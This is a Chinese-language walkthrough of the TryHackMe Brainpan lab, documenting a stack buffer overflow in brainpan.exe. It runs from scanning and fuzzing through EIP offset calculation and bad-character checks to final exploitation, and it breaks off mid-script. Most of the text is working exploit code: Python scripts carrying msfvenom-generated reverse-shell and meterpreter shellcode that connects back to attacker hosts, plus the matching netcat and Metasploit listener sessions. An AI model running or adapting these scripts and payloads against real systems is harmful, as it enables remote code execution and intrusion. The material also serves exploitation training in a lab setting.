免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(rootkali)-[~/tryhackme/Brainpan]└─# nmap -sV -Pn 10.10.248.211Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-24 22:51 ESTNmap scan report for 10.10.248.211Host is up (0.32s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION9999/tcp open abyss?10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port9999-TCP:V=7.91%I=7%D=11/24%Time=619F086F%P=x86_64-pc-linux-gnu%r(NSF:ULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|_\SF:|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20SF:\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\|\SF:x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\SF:x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\SF:x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20_\SF:|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\SF:x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\SF:x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x20\SF:x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20SF:_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x20\SF:x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\xSF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20SF:\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPAN\SF:x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\SF:x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\nSF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2SF:0\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 92.55 seconds能够看到只开了一个http服务和一个未知的9999端口服务
目录爆破
┌──(rootkali)-[~/tryhackme/Brainpan]└─# gobuster dir -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.248.211:10000/===============================================================Gobuster v3.1.0by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://10.10.248.211:10000/[+] Method: GET[+] Threads: 10[+] Wordlist: /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.1.0[+] Timeout: 10s===============================================================2021/11/24 22:55:37 Starting gobuster in directory enumeration mode===============================================================/bin (Status: 301) [Size: 0] [--> /bin/]有一个/bin目录,把外面的brainpan.exe下载到本地windows机器关上,发现开了一个9999端口的服务,由此可见靶机上的9999端口服务跑的也是这个程序。
缓冲区溢出验证
FUZZING
因为缓冲区溢出须要重复测试,咱们须要在本地另外筹备一台windows靶机。这边准备了一台win7主机,内网IP是192.168.3.49,预装了Immunity Debugger调试软件
咱们用以下fuzzy.py代码开始fuzzing
#!/usr/bin/env python3import socket, time, sysip = "192.168.3.49"port = 9999timeout = 5prefix = "OVERFLOW1 "string = prefix + "A" * 100while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1)能够看见,在发送600个字节时靶机程序解体
计算EIP地位
此时咱们生成一段不反复字节,咱们在这里抉择600个字节,执行:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
┌──(rootkali)-[~/tryhackme/Brainpan]└─# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9筹备好咱们的第二个脚本exploit.py,把下面生成的字节码copy到变量payload中:
#coding=utf-8#!/usr/bin/python#这里次要是为了定位EIP的内存地址import socketip = "192.168.3.49"port = 9999prefix = "OVERFLOW1 "offset = 0 overflow = "A" * offsetretn = ""padding = ""payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"postfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!")except: print("Could not connect.")在Immunity Debugger中重启brainpan.exe程序,而后执行下面的exploit.py
察看Immunity Debugger中EIP的值:72413172
计算出EIP的偏移量,执行:
msf-pattern_offset -q 72413172
┌──(rootkali)-[~/tryhackme/Brainpan]└─# msf-pattern_offset -q 72413172[*] Exact match at offset 514得出偏移量值为:514
查找坏字节
咱们在Immunity Debugger中输出:!mona bytearray -b "\x00"
0x00在C/C++语言中示意终止,所以是一个很广泛的坏字节,在下面咱们首先把它排除掉。
咱们用上面的bytearray.py脚本生成所有字节码:
for x in range(1, 256): print("\\x" + "{:02x}".format(x), end='')print()执行:
┌──(rootkali)-[~/tryhackme/Brainpan]└─# python3 bytearray.py \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff此时咱们筹备第二个攻打脚本exploit2.py,把下面生成的字节码粘贴到payload变量
import socketip = "192.168.3.49"port = 9999prefix = "OVERFLOW1 "offset = 514overflow = "A" * offsetretn = "BBBB"padding = ""payload = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"postfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!")except: print("Could not connect.")同时,咱们把偏移量514赋值到offset变量,把"BBBB"赋值到retn变量,重启brainpan.exe,执行下面的脚本
咱们能够查看到EIP的值,此时曾经变成了42424242,42在ASCII里就是大写的B,也就是咱们下面的exploit.py外面retn的值,此时已证实能够笼罩到EIP。
另外,记住这里ESP的值是:0028F930
咱们执行!mona compare -f C:\mona\brainpan\bytearray.bin -a 0028F930
竟然没有坏字节,过节了。
然而须要留神,0x00在C/C++语言中示意终止,所以是一个很广泛的坏字节,因而在这种状况下,咱们能够认为惟一的坏字节是:\x00
找到能够利用的ESP地址
!mona jmp -r esp -cpb "\x00"
有一个能够利用的地址,记录内存地址:311712F3
须要留神的是这个地址须要从前面往回写,即:\xf3\x12\x17\x31
利用msfvenom ,咱们生成攻打的shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.3.67 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
┌──(rootkali)-[~/tryhackme/Brainpan]└─# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.3.67 LPORT=4444 EXITFUNC=thread -b "\x00" -f c[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadFound 11 compatible encodersAttempting to encode payload with 1 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 351 (iteration=0)x86/shikata_ga_nai chosen with final size 351Payload size: 351 bytesFinal size of c file: 1500 bytesunsigned char buf[] = "\xda\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x52\xba\x3d\x6b\xed""\x34\x31\x56\x17\x03\x56\x17\x83\xd3\x97\x0f\xc1\xd7\x80\x52""\x2a\x27\x51\x33\xa2\xc2\x60\x73\xd0\x87\xd3\x43\x92\xc5\xdf""\x28\xf6\xfd\x54\x5c\xdf\xf2\xdd\xeb\x39\x3d\xdd\x40\x79\x5c""\x5d\x9b\xae\xbe\x5c\x54\xa3\xbf\x99\x89\x4e\xed\x72\xc5\xfd""\x01\xf6\x93\x3d\xaa\x44\x35\x46\x4f\x1c\x34\x67\xde\x16\x6f""\xa7\xe1\xfb\x1b\xee\xf9\x18\x21\xb8\x72\xea\xdd\x3b\x52\x22""\x1d\x97\x9b\x8a\xec\xe9\xdc\x2d\x0f\x9c\x14\x4e\xb2\xa7\xe3""\x2c\x68\x2d\xf7\x97\xfb\x95\xd3\x26\x2f\x43\x90\x25\x84\x07""\xfe\x29\x1b\xcb\x75\x55\x90\xea\x59\xdf\xe2\xc8\x7d\xbb\xb1""\x71\x24\x61\x17\x8d\x36\xca\xc8\x2b\x3d\xe7\x1d\x46\x1c\x60""\xd1\x6b\x9e\x70\x7d\xfb\xed\x42\x22\x57\x79\xef\xab\x71\x7e""\x10\x86\xc6\x10\xef\x29\x37\x39\x34\x7d\x67\x51\x9d\xfe\xec""\xa1\x22\x2b\xa2\xf1\x8c\x84\x03\xa1\x6c\x75\xec\xab\x62\xaa""\x0c\xd4\xa8\xc3\xa7\x2f\x3b\x2c\x9f\x2c\xf8\xc4\xe2\x32\xef""\x48\x6a\xd4\x65\x61\x3a\x4f\x12\x18\x67\x1b\x83\xe5\xbd\x66""\x83\x6e\x32\x97\x4a\x87\x3f\x8b\x3b\x67\x0a\xf1\xea\x78\xa0""\x9d\x71\xea\x2f\x5d\xff\x17\xf8\x0a\xa8\xe6\xf1\xde\x44\x50""\xa8\xfc\x94\x04\x93\x44\x43\xf5\x1a\x45\x06\x41\x39\x55\xde""\x4a\x05\x01\x8e\x1c\xd3\xff\x68\xf7\x95\xa9\x22\xa4\x7f\x3d""\xb2\x86\xbf\x3b\xbb\xc2\x49\xa3\x0a\xbb\x0f\xdc\xa3\x2b\x98""\xa5\xd9\xcb\x67\x7c\x5a\xeb\x85\x54\x97\x84\x13\x3d\x1a\xc9""\xa3\xe8\x59\xf4\x27\x18\x22\x03\x37\x69\x27\x4f\xff\x82\x55""\xc0\x6a\xa4\xca\xe1\xbe";把生成的shellcode放到咱们最初一个攻打脚本exploit3.py中
import socketip = "192.168.3.49"port = 9999prefix = "OVERFLOW1 "offset = 514 overflow = "A" * offsetretn = "\xf3\x12\x17\x31"padding = "\x90" * 16buf = ""buf +="\xda\xde\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x52\xba\x3d\x6b\xed"buf +="\x34\x31\x56\x17\x03\x56\x17\x83\xd3\x97\x0f\xc1\xd7\x80\x52"buf +="\x2a\x27\x51\x33\xa2\xc2\x60\x73\xd0\x87\xd3\x43\x92\xc5\xdf"buf +="\x28\xf6\xfd\x54\x5c\xdf\xf2\xdd\xeb\x39\x3d\xdd\x40\x79\x5c"buf +="\x5d\x9b\xae\xbe\x5c\x54\xa3\xbf\x99\x89\x4e\xed\x72\xc5\xfd"buf +="\x01\xf6\x93\x3d\xaa\x44\x35\x46\x4f\x1c\x34\x67\xde\x16\x6f"buf +="\xa7\xe1\xfb\x1b\xee\xf9\x18\x21\xb8\x72\xea\xdd\x3b\x52\x22"buf +="\x1d\x97\x9b\x8a\xec\xe9\xdc\x2d\x0f\x9c\x14\x4e\xb2\xa7\xe3"buf +="\x2c\x68\x2d\xf7\x97\xfb\x95\xd3\x26\x2f\x43\x90\x25\x84\x07"buf +="\xfe\x29\x1b\xcb\x75\x55\x90\xea\x59\xdf\xe2\xc8\x7d\xbb\xb1"buf +="\x71\x24\x61\x17\x8d\x36\xca\xc8\x2b\x3d\xe7\x1d\x46\x1c\x60"buf +="\xd1\x6b\x9e\x70\x7d\xfb\xed\x42\x22\x57\x79\xef\xab\x71\x7e"buf +="\x10\x86\xc6\x10\xef\x29\x37\x39\x34\x7d\x67\x51\x9d\xfe\xec"buf +="\xa1\x22\x2b\xa2\xf1\x8c\x84\x03\xa1\x6c\x75\xec\xab\x62\xaa"buf +="\x0c\xd4\xa8\xc3\xa7\x2f\x3b\x2c\x9f\x2c\xf8\xc4\xe2\x32\xef"buf +="\x48\x6a\xd4\x65\x61\x3a\x4f\x12\x18\x67\x1b\x83\xe5\xbd\x66"buf +="\x83\x6e\x32\x97\x4a\x87\x3f\x8b\x3b\x67\x0a\xf1\xea\x78\xa0"buf +="\x9d\x71\xea\x2f\x5d\xff\x17\xf8\x0a\xa8\xe6\xf1\xde\x44\x50"buf +="\xa8\xfc\x94\x04\x93\x44\x43\xf5\x1a\x45\x06\x41\x39\x55\xde"buf +="\x4a\x05\x01\x8e\x1c\xd3\xff\x68\xf7\x95\xa9\x22\xa4\x7f\x3d"buf +="\xb2\x86\xbf\x3b\xbb\xc2\x49\xa3\x0a\xbb\x0f\xdc\xa3\x2b\x98"buf +="\xa5\xd9\xcb\x67\x7c\x5a\xeb\x85\x54\x97\x84\x13\x3d\x1a\xc9"buf +="\xa3\xe8\x59\xf4\x27\x18\x22\x03\x37\x69\x27\x4f\xff\x82\x55"buf +="\xc0\x6a\xa4\xca\xe1\xbe";payload = bufpostfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!")except: print("Could not connect.")在kali开启一个监听,执行下面代码,收到本地靶机的反弹shell
┌──(rootkali)-[~/tryhackme/Brainpan]└─# nc -lnvp 4444 listening on [any] 4444 ...connect to [192.168.3.67] from (UNKNOWN) [192.168.3.49] 49215Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:\Users\max\Desktop>whoamiwhoamiwin-mrft0tavd10\maxC:\Users\max\Desktop>到此为止,咱们曾经胜利验证brainpan.exe存在一个缓冲区溢出破绽,并且给出了攻打代码。
攻打
为了后续浸透提权不便,在攻打近程靶机时,咱们的payload换成了meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.21.169 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
正式攻打脚本:
import socketip = "10.10.80.112"port = 9999prefix = "OVERFLOW1 "offset = 514 overflow = "A" * offsetretn = "\xf3\x12\x17\x31"padding = "\x90" * 16buf = ""buf +="\xbd\xb2\x86\x88\xad\xdb\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"buf +="\x5e\x31\x68\x15\x03\x68\x15\x83\xe8\xfc\xe2\x47\x7a\x60\x22"buf +="\xa7\x83\x71\x5d\x2e\x66\x40\x4f\x54\xe2\xf1\x5f\x1f\xa6\xf9"buf +="\x14\x4d\x53\x33\xd4\x7e\xec\x79\x0c\x0b\x60\x56\x61\xcb\x29"buf +="\x9a\xe0\xb7\x33\xcf\xc2\x86\xfb\x02\x02\xcf\x4d\x68\xeb\x9d"buf +="\x1a\x19\xa1\x31\x2e\x5f\x7a\x30\xe0\xeb\xc2\x4a\x85\x2c\xb6"buf +="\xe6\x84\x7c\x67\x7d\xce\x64\x03\xd9\xef\x95\xc0\x5c\x26\xe1"buf +="\xda\x17\x88\xf5\xa8\x93\x61\x08\x79\xea\xb5\xa7\x44\xc3\x3b"buf +="\xb9\x81\xe3\xa3\xcc\xf9\x10\x59\xd7\x39\x6b\x85\x52\xde\xcb"buf +="\x4e\xc4\x3a\xea\x83\x93\xc9\xe0\x68\xd7\x96\xe4\x6f\x34\xad"buf +="\x10\xfb\xbb\x62\x91\xbf\x9f\xa6\xfa\x64\x81\xff\xa6\xcb\xbe"buf +="\xe0\x0e\xb3\x1a\x6a\xbc\xa2\x1b\x93\x3f\xcb\x41\x04\x8c\x06"buf +="\x7a\xd4\x9a\x11\x09\xe6\x05\x8a\x85\x4a\xce\x14\x51\xda\xd8"buf +="\xa6\x8d\x64\x88\x58\x2e\x95\x81\x9e\x7a\xc5\xb9\x37\x03\x8e"buf +="\x39\xb7\xd6\x3b\x33\x2f\xd3\xb6\x56\x06\x8b\xca\x58\x49\x10"buf +="\x42\xbe\x39\xf8\x04\x6e\xfa\xa8\xe4\xde\x92\xa2\xea\x01\x82"buf +="\xcc\x20\x2a\x29\x23\x9d\x03\xc6\xda\x84\xdf\x77\x22\x13\x9a"buf +="\xb8\xa8\x96\x5b\x76\x59\xd2\x4f\x6f\x3e\x1c\x8f\x70\xab\x1c"buf +="\xe5\x74\x7d\x4a\x91\x76\x58\xbc\x3e\x88\x8f\xbe\x38\x76\x4e"buf +="\xf7\x33\x41\xc4\xb7\x2b\xae\x08\x38\xab\xf8\x42\x38\xc3\x5c"buf +="\x37\x6b\xf6\xa2\xe2\x1f\xab\x36\x0d\x76\x18\x90\x65\x74\x47"buf +="\xd6\x29\x87\xa2\x64\x2d\x77\x31\x43\x96\x10\xc9\xd3\x26\xe1"buf +="\xa3\xd3\x76\x89\x38\xfb\x79\x79\xc1\xd6\xd1\x11\x48\xb7\x90"buf +="\x80\x4d\x92\x75\x1d\x4e\x11\xae\xae\x35\x5a\x51\x4f\xca\x72"buf +="\x36\x4f\xcb\x7a\x48\x73\x1a\x43\x3e\xb2\x9f\xf0\x21\x29\x35"buf +="\x0d\xca\xf4\xdc\xac\x97\x06\x0b\xf2\xa1\x84\xb9\x8b\x55\x94"buf +="\xc8\x8e\x12\x12\x21\xe3\x0b\xf7\x45\x50\x2b\xd2";payload = bufpostfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!")except: print("Could not connect.")初始shell
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf6 exploit(multi/handler) > set lhost tun0lhost => 10.13.21.169msf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 10.13.21.169:4444 [*] Sending stage (175174 bytes) to 10.10.80.112[*] Meterpreter session 1 opened (10.13.21.169:4444 -> 10.10.80.112:47932) at 2021-11-25 03:49:39 -0500meterpreter > getuidServer username: brainpan\puck提权
咱们察看靶机的目录构造,看着像是一台linux的机器,而且我在下面的meterpreter里,不能切换到windows的失常shell
meterpreter > pwdZ:\home\puckmeterpreter > cd /meterpreter > lsListing: Z:\============Mode Size Type Last modified Name---- ---- ---- ------------- ----40777/rwxrwxrwx 0 dir 2013-03-04 13:02:15 -0500 bin40777/rwxrwxrwx 0 dir 2013-03-04 11:19:23 -0500 boot40777/rwxrwxrwx 0 dir 2021-11-25 03:46:35 -0500 etc40777/rwxrwxrwx 0 dir 2013-03-04 11:49:37 -0500 home100666/rw-rw-rw- 15084717 fil 2013-03-04 11:18:57 -0500 initrd.img100666/rw-rw-rw- 15084717 fil 2013-03-04 11:18:57 -0500 initrd.img.old40777/rwxrwxrwx 0 dir 2013-03-04 13:04:41 -0500 lib40777/rwxrwxrwx 0 dir 2013-03-04 10:12:09 -0500 lost+found40777/rwxrwxrwx 0 dir 2013-03-04 10:12:14 -0500 media40777/rwxrwxrwx 0 dir 2012-10-09 10:59:43 -0400 mnt40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 opt40777/rwxrwxrwx 0 dir 2013-03-07 23:07:15 -0500 root40777/rwxrwxrwx 0 dir 2021-11-25 03:46:37 -0500 run40777/rwxrwxrwx 0 dir 2013-03-04 11:20:14 -0500 sbin40777/rwxrwxrwx 0 dir 2012-06-11 10:43:21 -0400 selinux40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 srv40777/rwxrwxrwx 0 dir 2021-11-25 04:44:01 -0500 tmp40777/rwxrwxrwx 0 dir 2013-03-04 10:13:47 -0500 usr40777/rwxrwxrwx 0 dir 2019-08-05 16:47:05 -0400 var100666/rw-rw-rw- 5180432 fil 2013-02-25 14:32:04 -0500 vmlinuz100666/rw-rw-rw- 5180432 fil 2013-02-25 14:32:04 -0500 vmlinuz.oldmeterpreter > sysinfoComputer : brainpanOS : Windows XP (5.1 Build 2600, Service Pack 3).Architecture : x86System Language : en_USDomain : brainpanLogged On Users : 1Meterpreter : x86/windows于是咱们另外编译一个linux的shell,由上可知这台机器是x86架构的
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.13.21.169 LPORT=4444 EXITFUNC=thread -b "\x00" -f c
咱们把下面生成的payload放到上面的攻打脚本中
import socketip = "10.10.80.112"port = 9999prefix = "OVERFLOW1 "offset = 514 overflow = "A" * offsetretn = "\xf3\x12\x17\x31"padding = "\x90" * 16buf = ""buf +="\xd9\xcd\xd9\x74\x24\xf4\xbe\x81\x04\xa8\x7a\x58\x33\xc9\xb1"buf +="\x12\x83\xc0\x04\x31\x70\x13\x03\xf1\x17\x4a\x8f\xc0\xcc\x7d"buf +="\x93\x71\xb0\xd2\x3e\x77\xbf\x34\x0e\x11\x72\x36\xfc\x84\x3c"buf +="\x08\xce\xb6\x74\x0e\x29\xde\x8c\xfd\xdc\xb7\xf9\xff\xde\xd6"buf +="\xa5\x76\x3f\x68\x33\xd9\x91\xdb\x0f\xda\x98\x3a\xa2\x5d\xc8"buf +="\xd4\x53\x71\x9e\x4c\xc4\xa2\x4f\xee\x7d\x34\x6c\xbc\x2e\xcf"buf +="\x92\xf0\xda\x02\xd4";payload = bufpostfix = ""buffer = prefix + overflow + retn + padding + payload + postfixs = socket.socket(socket.AF_INET, 